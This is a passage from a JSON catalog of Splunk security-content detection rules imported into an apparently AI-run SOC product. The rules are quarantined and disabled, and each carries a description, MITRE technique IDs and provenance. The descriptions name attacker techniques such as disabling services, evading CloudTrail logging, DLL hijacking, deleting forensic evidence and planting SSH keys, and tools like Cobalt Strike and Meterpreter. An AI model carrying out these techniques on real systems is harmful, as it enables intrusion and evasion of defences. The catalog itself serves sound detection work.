By monitoring for unusual or unauthorized chattr usage, this analytic helps identify potential tampering with critical files, enabling security teams to quickly respond to and mitigate threats associated with unauthorized file attribute changes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-file-permissions-modification-via-chattr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2d1110d-b01c-4a58-9975-90a9edeb083a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_file_permissions_modification_via_chattr.yml" } }, { "id": "splunk-security-content-f2e08a38-6689-4df4-ad8c-b51c16262316", "type": "detection", "name": "Linux Disable Services", "description": "The following analytic detects attempts to disable a service on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes like \"systemctl,\" \"service,\" and \"svcadm\" with commands containing \"disable.\" This activity is significant as adversaries may disable security or critical services to evade detection and facilitate further malicious actions, such as deploying destructive payloads. 
If confirmed malicious, this could lead to the termination of essential security services, allowing attackers to persist undetected and potentially cause significant damage to the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-disable-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f2e08a38-6689-4df4-ad8c-b51c16262316", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_disable_services.yml" } }, { "id": "splunk-security-content-f308490a-473a-40ef-ae64-dd7a6eba284a", "type": "detection", "name": "Suspicious GPUpdate no Command Line Arguments", "description": "The following analytic detects the execution of gpupdate.exe without any command line arguments. This behavior is identified using data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. It is significant because gpupdate.exe typically runs with specific arguments, and its execution without them is often associated with malicious activities, such as those performed by Cobalt Strike. 
If confirmed malicious, this activity could indicate an attempt to execute unauthorized commands or scripts, potentially leading to further system compromise or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-gpupdate-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f308490a-473a-40ef-ae64-dd7a6eba284a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_gpupdate_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-f32598bb-fa5f-4afd-8ab3-0263cc28efbc", "type": "detection", "name": "ASL AWS Disable Bucket Versioning", "description": "The following analytic detects when AWS S3 bucket versioning is suspended by a user. It leverages AWS CloudTrail logs to identify `PutBucketVersioning` events with the `VersioningConfiguration.Status` set to `Suspended`. This activity is significant because disabling versioning can prevent recovery of deleted or modified data, which is a common tactic in ransomware attacks. 
If confirmed malicious, this action could lead to data loss and hinder recovery efforts, severely impacting data integrity and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-disable-bucket-versioning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f32598bb-fa5f-4afd-8ab3-0263cc28efbc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_disable_bucket_versioning.yml" } }, { "id": "splunk-security-content-f36c0d3f-d57f-4b88-a5d4-0a4c9a0752f6", "type": "detection", "name": "Cisco Duo Policy Allow Old Flash", "description": "The following analytic identifies instances where a Duo administrator creates or updates a policy to allow the use of outdated Flash components, specifically by detecting policy changes with the flash_remediation=no remediation attribute. It leverages Duo activity logs ingested via the Cisco Security Cloud App, searching for policy_update or policy_create actions and parsing the policy description for indicators of weakened security controls. This behavior is significant for a SOC because permitting old Flash increases the attack surface, as Flash is widely known for its security vulnerabilities and is no longer supported. Attackers may exploit such policy changes to bypass security controls, introduce malware, or escalate privileges within the environment. 
Detecting and responding to these policy modifications helps prevent potential exploitation, reduces organizational risk, and ensures adherence to security best practices. Immediate investigation is recommended to determine if the change was authorized or indicative of malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-allow-old-flash.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f36c0d3f-d57f-4b88-a5d4-0a4c9a0752f6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_allow_old_flash.yml" } }, { "id": "splunk-security-content-f39ee679-3b1e-4f47-841c-5c3c580acda2", "type": "detection", "name": "Windows DLL Search Order Hijacking with iscsicpl", "description": "The following analytic detects DLL search order hijacking involving iscsicpl.exe. It identifies when iscsicpl.exe loads a malicious DLL from a new path, triggering the payload execution. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on child processes spawned by iscsicpl.exe. This activity is significant as it indicates a potential attempt to execute unauthorized code via DLL hijacking. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dll-search-order-hijacking-with-iscsicpl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f39ee679-3b1e-4f47-841c-5c3c580acda2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dll_search_order_hijacking_with_iscsicpl.yml" } }, { "id": "splunk-security-content-f3e86ff3-b1f9-4382-8924-6913385f1019", "type": "detection", "name": "Windows RDP Cache File Deletion", "description": "This detection identifies the deletion of RDP bitmap cache files\u2014specifically .bmc and .bin files\u2014typically stored in the user profile under the Terminal Server Client\\Cache directory. These files are created by the native Windows Remote Desktop Client (mstsc.exe) and store graphical elements from remote sessions to improve performance. Deleting these files may indicate an attempt to remove forensic evidence of RDP usage. While rare in legitimate user behavior, this action is commonly associated with defense evasion techniques used by attackers or red teamers who wish to hide traces of interactive remote access. When observed in conjunction with recent logon activity, RDP session indicators, or script execution, this behavior should be treated as potentially malicious. 
Monitoring for deletion of these files provides valuable visibility into anti-forensic actions that often follow lateral movement or hands-on-keyboard activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-cache-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f3e86ff3-b1f9-4382-8924-6913385f1019", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_cache_file_deletion.yml" } }, { "id": "splunk-security-content-f3eb471c-16d0-404d-897c-7653f0a78cba", "type": "detection", "name": "ASL AWS Defense Evasion Update Cloudtrail", "description": "The following analytic detects `UpdateTrail` events within AWS CloudTrail logs, aiming to identify attempts by attackers to evade detection by altering logging configurations. By updating CloudTrail settings with incorrect parameters, such as changing multi-regional logging to a single region, attackers can impair the logging of their activities across other regions. This behavior is crucial for Security Operations Centers (SOCs) to identify, as it indicates an adversary's intent to operate undetected within a compromised AWS environment. 
The impact of such evasion tactics is significant, potentially allowing malicious activities to proceed without being logged, thereby hindering incident response and forensic investigations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-update-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f3eb471c-16d0-404d-897c-7653f0a78cba", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_update_cloudtrail.yml" } }, { "id": "splunk-security-content-f421c250-24e7-11ec-bc43-acde48001122", "type": "detection", "name": "Regsvr32 Silent and Install Param Dll Loading", "description": "The following analytic detects the loading of a DLL using the regsvr32 application with the silent parameter and DLLInstall execution. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments and parent process details. This activity is significant as it is commonly used by RAT malware like Remcos and njRAT to load malicious DLLs on compromised machines. 
If confirmed malicious, this technique could allow attackers to execute arbitrary code, maintain persistence, and further compromise the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/regsvr32-silent-and-install-param-dll-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f421c250-24e7-11ec-bc43-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/regsvr32_silent_and_install_param_dll_loading.yml" } }, { "id": "splunk-security-content-f443dac2-c7cf-11eb-ab51-acde48001122", "type": "detection", "name": "Excessive number of taskhost processes", "description": "The following analytic identifies an excessive number of taskhost.exe and taskhostex.exe processes running within a short time frame. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and their counts. This behavior is significant as it is commonly associated with post-exploitation tools like Meterpreter and Koadic, which use multiple instances of these processes for actions such as discovery and lateral movement. 
If confirmed malicious, this activity could indicate an ongoing attack, allowing attackers to execute code, escalate privileges, or move laterally within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-number-of-taskhost-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f443dac2-c7cf-11eb-ab51-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_number_of_taskhost_processes.yml" } }, { "id": "splunk-security-content-f48a5557-be06-4b96-b8e8-be563e387620", "type": "detection", "name": "Windows ESX Admins Group Creation via PowerShell", "description": "This analytic detects attempts to create an \"ESX Admins\" group using PowerShell commands. This activity may indicate an attempt to exploit the VMware ESXi Active Directory Integration Authentication Bypass vulnerability (CVE-2024-37085). 
Attackers can use this method to gain unauthorized access to ESXi hosts by recreating the 'ESX Admins' group after its deletion from Active Directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.002", "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-esx-admins-group-creation-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f48a5557-be06-4b96-b8e8-be563e387620", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_esx_admins_group_creation_via_powershell.yml" } }, { "id": "splunk-security-content-f4bb7321-7e64-4d1e-b1aa-21f8b019a91f", "type": "detection", "name": "Linux Auditd Edit Cron Table Parameter", "description": "The following analytic detects the suspicious editing of cron jobs in Linux using the crontab command-line parameter (-e). It identifies this activity by monitoring command-line executions involving 'crontab' and the edit parameter. This behavior is significant for a SOC as cron job manipulations can indicate unauthorized persistence attempts or scheduled malicious actions. 
If confirmed malicious, this activity could lead to system compromise, unauthorized access, or broader network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-edit-cron-table-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f4bb7321-7e64-4d1e-b1aa-21f8b019a91f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_edit_cron_table_parameter.yml" } }, { "id": "splunk-security-content-f4ca0057-cbf3-44f8-82ea-4e330ee901d3", "type": "detection", "name": "Okta Phishing Detection with FastPass Origin Check", "description": "The following analytic identifies failed user authentication attempts in Okta due to FastPass declining a phishing attempt. It leverages Okta logs, specifically looking for events where multi-factor authentication (MFA) fails with the reason \"FastPass declined phishing attempt.\" This activity is significant as it indicates that attackers are targeting users with real-time phishing proxies, attempting to capture credentials. 
If confirmed malicious, this could lead to unauthorized access to user accounts, potentially compromising sensitive information and furthering lateral movement within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.001", "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-phishing-detection-with-fastpass-origin-check.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f4ca0057-cbf3-44f8-82ea-4e330ee901d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_phishing_detection_with_fastpass_origin_check.yml" } }, { "id": "splunk-security-content-f4cabbc7-c19a-4e41-8be5-98daeaccbb50", "type": "detection", "name": "O365 Compliance Content Search Started", "description": "The following analytic detects when a content search is initiated within the Office 365 Security and Compliance Center. It leverages the SearchCreated operation from the o365_management_activity logs under the SecurityComplianceCenter workload. This activity is significant as it may indicate an attempt to access sensitive organizational data, including emails and documents. If confirmed malicious, this could lead to unauthorized data access, potential data exfiltration, and compliance violations. 
Monitoring this behavior helps ensure the integrity and security of organizational data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-compliance-content-search-started.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f4cabbc7-c19a-4e41-8be5-98daeaccbb50", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_compliance_content_search_started.yml" } }, { "id": "splunk-security-content-f4f837e2-91fb-11eb-8bf6-acde48001122", "type": "detection", "name": "Disabling SystemRestore In Registry", "description": "The following analytic detects the modification of registry keys to disable System Restore on a machine. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with System Restore settings. This activity is significant because disabling System Restore can hinder recovery efforts and is a tactic often used by Remote Access Trojans (RATs) to maintain persistence on an infected system. 
If confirmed malicious, this action could prevent system recovery, allowing the attacker to sustain their foothold and potentially cause further damage or data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-systemrestore-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f4f837e2-91fb-11eb-8bf6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_systemrestore_in_registry.yml" } }, { "id": "splunk-security-content-f5198224-551c-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious msbuild path", "description": "The following analytic detects the execution of msbuild.exe from a non-standard path. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that deviate from typical msbuild.exe locations. This activity is significant because msbuild.exe is commonly abused by attackers to execute malicious code, and running it from an unusual path can indicate an attempt to evade detection. 
If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, potentially leading to system compromise and further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1127.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-msbuild-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5198224-551c-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_msbuild_path.yml" } }, { "id": "splunk-security-content-f52b55ce-41ad-4802-9909-fbd7cc8410a5", "type": "detection", "name": "Windows Rundll32 with Non-Standard File Extension", "description": "This analytic identifies instances of the rundll32.exe process loading a module whose file extension is not a standard Windows module extension.\nThis behavior is uncommon and can be associated with malicious activities, such as the Gh0st RAT backdoor. 
This technique is used to evade possible detection by security tools that monitor suspicious DLL loading activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-with-non-standard-file-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f52b55ce-41ad-4802-9909-fbd7cc8410a5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_with_non_standard_file_extension.yml" } }, { "id": "splunk-security-content-f52d2db8-31f9-4aa7-a176-25779effe55c", "type": "detection", "name": "Suspicious SearchProtocolHost no Command Line Arguments", "description": "The following analytic detects instances of searchprotocolhost.exe running without command line arguments.\nThis behavior is unusual and often associated with malicious activities, such as those performed by Cobalt Strike.\nThe detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process execution data.\nThis activity is significant because searchprotocolhost.exe typically runs with specific arguments, and its absence may indicate an attempt to evade detection.\nIf confirmed malicious, this could lead to unauthorized code execution, potential credential dumping, or other malicious actions within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, 
"playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-searchprotocolhost-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f52d2db8-31f9-4aa7-a176-25779effe55c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_searchprotocolhost_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-f52d5c0b-d45d-4304-b300-a4f6a1130dec", "type": "detection", "name": "Cisco Configuration Archive Logging Analysis", "description": "This analytic provides comprehensive monitoring of configuration changes on Cisco devices by analyzing archive logs. Configuration archive logging captures all changes made to a device's configuration, providing a detailed audit trail that can be used to identify suspicious or malicious activities. This detection is particularly valuable for identifying patterns of malicious configuration changes that might indicate an attacker's presence, such as the creation of backdoor accounts, SNMP community string modifications, and TFTP server configurations for data exfiltration. 
By analyzing these logs, security teams can gain a holistic view of configuration changes across sessions and users, helping to detect sophisticated attack campaigns like those conducted by threat actors such as Static Tundra.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1098", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-configuration-archive-logging-analysis.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f52d5c0b-d45d-4304-b300-a4f6a1130dec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_configuration_archive_logging_analysis.yml" } }, { "id": "splunk-security-content-f533ca6c-9440-4686-80cb-7f294c07812a", "type": "detection", "name": "Detect Certify With PowerShell Script Block Logging", "description": "The following analytic detects the use of the Certify tool via an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. It leverages PowerShell Script Block Logging (EventCode 4104) to identify specific command patterns associated with Certify's enumeration and exploitation functions. This activity is significant as it indicates potential reconnaissance or exploitation attempts against AD CS, which could lead to unauthorized certificate issuance. 
If confirmed malicious, attackers could leverage this to escalate privileges, persist in the environment, or access sensitive information by abusing AD CS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-certify-with-powershell-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f533ca6c-9440-4686-80cb-7f294c07812a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_certify_with_powershell_script_block_logging.yml" } }, { "id": "splunk-security-content-f56936c0-ae6f-4eeb-91ff-ecc1448c6105", "type": "detection", "name": "Confluence Pre-Auth RCE via OGNL Injection CVE-2023-22527", "description": "The following analytic identifies attempts to exploit a critical template injection vulnerability (CVE-2023-22527) in outdated Confluence Data Center and Server versions. It detects POST requests to the \"/template/aui/text-inline.vm\" endpoint with HTTP status codes 200 or 202, indicating potential OGNL injection attacks. This activity is significant as it allows unauthenticated attackers to execute arbitrary code remotely. If confirmed malicious, attackers could gain full control over the affected Confluence instance, leading to data breaches, system compromise, and further network infiltration. 
Immediate patching is essential to mitigate this threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/confluence-pre-auth-rce-via-ognl-injection-cve-2023-22527.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f56936c0-ae6f-4eeb-91ff-ecc1448c6105", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/confluence_pre_auth_rce_via_ognl_injection_cve_2023_22527.yml" } }, { "id": "splunk-security-content-f5939373-8054-40ad-8c64-cec478a22a4a", "type": "detection", "name": "Remote Desktop Process Running On System", "description": "The following analytic detects the execution of the remote desktop process (mstsc.exe) on systems where it is not typically run. This detection leverages data from Endpoint Detection and Response (EDR) agents, filtering out systems categorized as common RDP sources. This activity is significant because unauthorized use of mstsc.exe can indicate lateral movement or unauthorized remote access attempts. 
If confirmed malicious, this could allow an attacker to gain remote control of a system, potentially leading to data exfiltration, privilege escalation, or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-desktop-process-running-on-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5939373-8054-40ad-8c64-cec478a22a4a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_desktop_process_running_on_system.yml" } }, { "id": "splunk-security-content-f5ab595e-28e5-4327-8077-5008ba97c850", "type": "detection", "name": "Linux SSH Authorized Keys Modification", "description": "The following analytic detects the modification of SSH Authorized Keys on Linux systems. It leverages process execution data from Endpoint Detection and Response (EDR) agents, specifically monitoring commands like \"bash\" and \"cat\" interacting with \"authorized_keys\" files. This activity is significant as adversaries often modify SSH Authorized Keys to establish persistent access to compromised endpoints. 
If confirmed malicious, this behavior could allow attackers to maintain unauthorized access, bypassing traditional authentication mechanisms and potentially leading to further exploitation or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ssh-authorized-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5ab595e-28e5-4327-8077-5008ba97c850", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ssh_authorized_keys_modification.yml" } }, { "id": "splunk-security-content-f5bde743-245a-4e1f-a152-3971cec6e9ef", "type": "detection", "name": "Windows Anomalous Registry Value Length in Environment Key", "description": "The following analytic detects creation or modification of registry values under a user or system Environment key (paths matching *\\Environment\\*) where the stored value exceeds 2,000 characters.\nLegitimate environment variables are typically short strings (paths, tokens, or flags); unusually long values can indicate adversaries or malware staging encoded payloads, bloated malicious PATH entries, or other data in a location that is loaded for every interactive session.\nThis behavior has been observed in contexts such as .NET infostealer activity. 
